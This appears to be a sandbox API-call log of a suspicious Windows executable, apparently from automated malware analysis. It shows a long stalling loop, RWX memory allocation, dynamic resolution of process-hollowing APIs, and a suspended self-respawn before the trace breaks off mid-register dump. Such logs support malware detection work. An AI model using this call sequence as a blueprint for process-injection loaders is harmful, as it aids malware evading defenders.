[0168.626] GetSystemDefaultLangID () returned 0x26b0409 [0168.626] GetThreadLocale () returned 0x409 [0168.626] GetCurrentProcess () returned 0xffffffff [0168.626] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.626] GetSystemDefaultLangID () returned 0x26b0409 [0168.626] GetThreadLocale () returned 0x409 [0168.626] GetCurrentProcess () returned 0xffffffff [0168.626] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.626] GetSystemDefaultLangID () returned 0x26b0409 [0168.626] GetThreadLocale () returned 0x409 [0168.626] GetCurrentProcess () returned 0xffffffff [0168.626] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.626] GetSystemDefaultLangID () returned 0x26b0409 [0168.626] GetThreadLocale () returned 0x409 [0168.626] GetCurrentProcess () returned 0xffffffff [0168.626] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.626] GetSystemDefaultLangID () returned 0x26b0409 [0168.626] GetThreadLocale () returned 0x409 [0168.626] GetCurrentProcess () returned 0xffffffff [0168.626] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.626] GetSystemDefaultLangID () returned 0x26b0409 [0168.626] GetThreadLocale () returned 0x409 [0168.626] GetCurrentProcess () returned 0xffffffff [0168.626] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.627] GetSystemDefaultLangID () returned 0x26b0409 [0168.627] GetThreadLocale () returned 0x409 [0168.627] GetCurrentProcess () returned 0xffffffff [0168.627] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.627] GetSystemDefaultLangID () returned 0x26b0409 [0168.627] GetThreadLocale () returned 0x409 [0168.627] GetCurrentProcess () returned 0xffffffff [0168.627] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.627] GetSystemDefaultLangID () returned 0x26b0409 [0168.627] GetThreadLocale () returned 0x409 [0168.627] GetCurrentProcess () returned 0xffffffff [0168.627] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.627] GetSystemDefaultLangID () returned 0x26b0409 [0168.627] GetThreadLocale () returned 0x409 [0168.627] GetCurrentProcess () returned 0xffffffff [0168.627] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.627] GetSystemDefaultLangID () returned 0x26b0409 [0168.627] GetThreadLocale () returned 0x409 [0168.627] GetCurrentProcess () returned 0xffffffff [0168.627] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.627] GetSystemDefaultLangID () returned 0x26b0409 [0168.627] GetThreadLocale () returned 0x409 [0168.627] GetCurrentProcess () returned 0xffffffff [0168.627] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.627] GetSystemDefaultLangID () returned 0x26b0409 [0168.627] GetThreadLocale () returned 0x409 [0168.627] GetCurrentProcess () returned 0xffffffff [0168.627] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.627] GetSystemDefaultLangID () returned 0x26b0409 [0168.627] GetThreadLocale () returned 0x409 [0168.627] GetCurrentProcess () returned 0xffffffff [0168.627] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.627] GetSystemDefaultLangID () returned 0x26b0409 [0168.628] GetThreadLocale () returned 0x409 [0168.628] GetCurrentProcess () returned 0xffffffff [0168.628] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.628] GetSystemDefaultLangID () returned 0x26b0409 [0168.628] GetThreadLocale () returned 0x409 [0168.628] GetCurrentProcess () returned 0xffffffff [0168.628] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.628] GetSystemDefaultLangID () returned 0x26b0409 [0168.628] GetThreadLocale () returned 0x409 [0168.628] GetCurrentProcess () returned 0xffffffff [0168.628] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.628] GetSystemDefaultLangID () returned 0x26b0409 [0168.628] GetThreadLocale () returned 0x409 [0168.628] GetCurrentProcess () returned 0xffffffff [0168.628] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.628] GetSystemDefaultLangID () returned 0x26b0409 [0168.628] GetThreadLocale () returned 0x409 [0168.628] GetCurrentProcess () returned 0xffffffff [0168.628] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.628] GetSystemDefaultLangID () returned 0x26b0409 [0168.628] GetThreadLocale () returned 0x409 [0168.628] GetCurrentProcess () returned 0xffffffff [0168.628] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.628] GetSystemDefaultLangID () returned 0x26b0409 [0168.628] GetThreadLocale () returned 0x409 [0168.628] GetCurrentProcess () returned 0xffffffff [0168.628] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.628] GetSystemDefaultLangID () returned 0x26b0409 [0168.628] GetThreadLocale () returned 0x409 [0168.628] GetCurrentProcess () returned 0xffffffff [0168.628] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.628] GetSystemDefaultLangID () returned 0x26b0409 [0168.628] GetThreadLocale () returned 0x409 [0168.629] GetCurrentProcess () returned 0xffffffff [0168.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.629] GetSystemDefaultLangID () returned 0x26b0409 [0168.629] GetThreadLocale () returned 0x409 [0168.629] GetCurrentProcess () returned 0xffffffff [0168.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.629] GetSystemDefaultLangID () returned 0x26b0409 [0168.629] GetThreadLocale () returned 0x409 [0168.629] GetCurrentProcess () returned 0xffffffff [0168.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.629] GetSystemDefaultLangID () returned 0x26b0409 [0168.629] GetThreadLocale () returned 0x409 [0168.629] GetCurrentProcess () returned 0xffffffff [0168.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.629] GetSystemDefaultLangID () returned 0x26b0409 [0168.629] GetThreadLocale () returned 0x409 [0168.629] GetCurrentProcess () returned 0xffffffff [0168.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.629] GetSystemDefaultLangID () returned 0x26b0409 [0168.629] GetThreadLocale () returned 0x409 [0168.629] GetCurrentProcess () returned 0xffffffff [0168.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.629] GetSystemDefaultLangID () returned 0x26b0409 [0168.629] GetThreadLocale () returned 0x409 [0168.629] GetCurrentProcess () returned 0xffffffff [0168.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.629] GetSystemDefaultLangID () returned 0x26b0409 [0168.629] GetThreadLocale () returned 0x409 [0168.629] GetCurrentProcess () returned 0xffffffff [0168.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.629] GetSystemDefaultLangID () returned 0x26b0409 [0168.629] GetThreadLocale () returned 0x409 [0168.629] GetCurrentProcess () returned 0xffffffff [0168.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.630] GetSystemDefaultLangID () returned 0x26b0409 [0168.630] GetThreadLocale () returned 0x409 [0168.630] GetCurrentProcess () returned 0xffffffff [0168.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.630] GetSystemDefaultLangID () returned 0x26b0409 [0168.630] GetThreadLocale () returned 0x409 [0168.630] GetCurrentProcess () returned 0xffffffff [0168.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.630] GetSystemDefaultLangID () returned 0x26b0409 [0168.630] GetThreadLocale () returned 0x409 [0168.630] GetCurrentProcess () returned 0xffffffff [0168.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.630] GetSystemDefaultLangID () returned 0x26b0409 [0168.630] GetThreadLocale () returned 0x409 [0168.630] GetCurrentProcess () returned 0xffffffff [0168.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.630] GetSystemDefaultLangID () returned 0x26b0409 [0168.630] GetThreadLocale () returned 0x409 [0168.630] GetCurrentProcess () returned 0xffffffff [0168.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.630] GetSystemDefaultLangID () returned 0x26b0409 [0168.630] GetThreadLocale () returned 0x409 [0168.630] GetCurrentProcess () returned 0xffffffff [0168.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.630] GetSystemDefaultLangID () returned 0x26b0409 [0168.630] GetThreadLocale () returned 0x409 [0168.630] GetCurrentProcess () returned 0xffffffff [0168.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.630] GetSystemDefaultLangID () returned 0x26b0409 [0168.630] GetThreadLocale () returned 0x409 [0168.630] GetCurrentProcess () returned 0xffffffff [0168.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.630] GetSystemDefaultLangID () returned 0x26b0409 [0168.630] GetThreadLocale () returned 0x409 [0168.631] GetCurrentProcess () returned 0xffffffff [0168.631] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.631] GetSystemDefaultLangID () returned 0x26b0409 [0168.631] GetThreadLocale () returned 0x409 [0169.931] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76600000 [0169.931] GetProcAddress (hModule=0x76600000, lpProcName="VirtualProtect") returned 0x76614317 [0169.931] VirtualProtect (in: lpAddress=0x2540020, dwSize=0x91100, flNewProtect=0x40, lpflOldProtect=0x18e818 | out: lpflOldProtect=0x18e818*=0x4) returned 1 [0170.366] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76600000 [0170.366] GetProcAddress (hModule=0x76600000, lpProcName="GlobalAlloc") returned 0x76615846 [0170.366] GetProcAddress (hModule=0x76600000, lpProcName="GetLastError") returned 0x766111c0 [0170.366] GetProcAddress (hModule=0x76600000, lpProcName="Sleep") returned 0x766110ff [0170.367] GetProcAddress (hModule=0x76600000, lpProcName="VirtualAlloc") returned 0x76611836 [0170.367] GetProcAddress (hModule=0x76600000, lpProcName="CreateToolhelp32Snapshot") returned 0x76637327 [0170.367] GetProcAddress (hModule=0x76600000, lpProcName="Module32First") returned 0x76696279 [0170.367] GetProcAddress (hModule=0x76600000, lpProcName="CloseHandle") returned 0x766113f0 [0170.367] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x5c [0170.370] Module32First (hSnapshot=0x5c, lpme=0x18e5a4) returned 1 [0170.373] VirtualAlloc (lpAddress=0x0, dwSize=0x11a5a0, flAllocationType=0x1000, flProtect=0x40) returned 0x3ec0000 [0170.475] LoadLibraryA (lpLibFileName="user32") returned 0x74e50000 [0170.475] GetProcAddress (hModule=0x74e50000, lpProcName="MessageBoxA") returned 0x74ebfd1e [0170.475] GetProcAddress (hModule=0x74e50000, lpProcName="GetMessageExtraInfo") returned 0x74e8ed76 [0170.475] LoadLibraryA (lpLibFileName="kernel32") returned 0x76600000 [0170.476] GetProcAddress (hModule=0x76600000, lpProcName="WinExec") returned 0x76693051 [0170.476] GetProcAddress (hModule=0x76600000, lpProcName="CreateFileA") returned 0x7661537e [0170.476] GetProcAddress (hModule=0x76600000, lpProcName="WriteFile") returned 0x76611282 [0170.476] GetProcAddress (hModule=0x76600000, lpProcName="CloseHandle") returned 0x766113f0 [0170.476] GetProcAddress (hModule=0x76600000, lpProcName="CreateProcessA") returned 0x76611072 [0170.476] GetProcAddress (hModule=0x76600000, lpProcName="GetThreadContext") returned 0x7663799c [0170.476] GetProcAddress (hModule=0x76600000, lpProcName="VirtualAlloc") returned 0x76611836 [0170.476] GetProcAddress (hModule=0x76600000, lpProcName="VirtualAllocEx") returned 0x7662d980 [0170.476] GetProcAddress (hModule=0x76600000, lpProcName="VirtualFree") returned 0x7661184e [0170.477] GetProcAddress (hModule=0x76600000, lpProcName="ReadProcessMemory") returned 0x7662cfa4 [0170.477] GetProcAddress (hModule=0x76600000, lpProcName="WriteProcessMemory") returned 0x7662d9b0 [0170.477] GetProcAddress (hModule=0x76600000, lpProcName="SetThreadContext") returned 0x76695933 [0170.477] GetProcAddress (hModule=0x76600000, lpProcName="ResumeThread") returned 0x766143a7 [0170.477] GetProcAddress (hModule=0x76600000, lpProcName="WaitForSingleObject") returned 0x76611136 [0170.477] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleFileNameA") returned 0x76611491 [0170.477] GetProcAddress (hModule=0x76600000, lpProcName="GetCommandLineA") returned 0x76615159 [0170.477] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76fa0000 [0170.486] GetProcAddress (hModule=0x76fa0000, lpProcName="NtUnmapViewOfSection") returned 0x76fbfc70 [0170.487] GetProcAddress (hModule=0x76fa0000, lpProcName="NtWriteVirtualMemory") returned 0x76fbfe04 [0170.487] GetProcAddress (hModule=0x74e50000, lpProcName="RegisterClassExA") returned 0x74e6db98 [0170.487] GetProcAddress (hModule=0x74e50000, lpProcName="CreateWindowExA") returned 0x74e6d22e [0170.487] GetProcAddress (hModule=0x74e50000, lpProcName="PostMessageA") returned 0x74e73baa [0170.487] GetProcAddress (hModule=0x74e50000, lpProcName="GetMessageA") returned 0x74e67bd3 [0170.487] GetProcAddress (hModule=0x74e50000, lpProcName="DefWindowProcA") returned 0x76fe24e0 [0170.487] GetProcAddress (hModule=0x76600000, lpProcName="GetFileAttributesA") returned 0x766153cc [0170.487] GetProcAddress (hModule=0x76600000, lpProcName="GetStartupInfoA") returned 0x76610e00 [0170.487] GetProcAddress (hModule=0x76600000, lpProcName="VirtualProtectEx") returned 0x76694b5f [0170.487] GetProcAddress (hModule=0x76600000, lpProcName="ExitProcess") returned 0x766179c8 [0170.488] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0170.490] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0170.490] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0170.490] RegisterClassExA (param_1=0x18e260) returned 0x25c068 [0170.505] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x20016 [0170.572] PostMessageA (hWnd=0x20016, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0170.573] GetMessageA (in: lpMsg=0x18e290, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e290) returned 1 [0170.573] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0170.573] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x210000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x8a [0170.573] GetStartupInfoA (in: lpStartupInfo=0x18e1b4 | out: lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0170.573] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart" [0170.573] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e20c | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart", lpProcessInformation=0x18e20c*(hProcess=0x78, hThread=0x74, dwProcessId=0x7d8, dwThreadId=0x7dc)) returned 1 [0170.598] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.599] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0170.599] GetThreadContext (in: hThread=0x74, lpContext=0x210000 | out: lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x4984b0, Ebp=0x0, Eip=0x76fb01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, 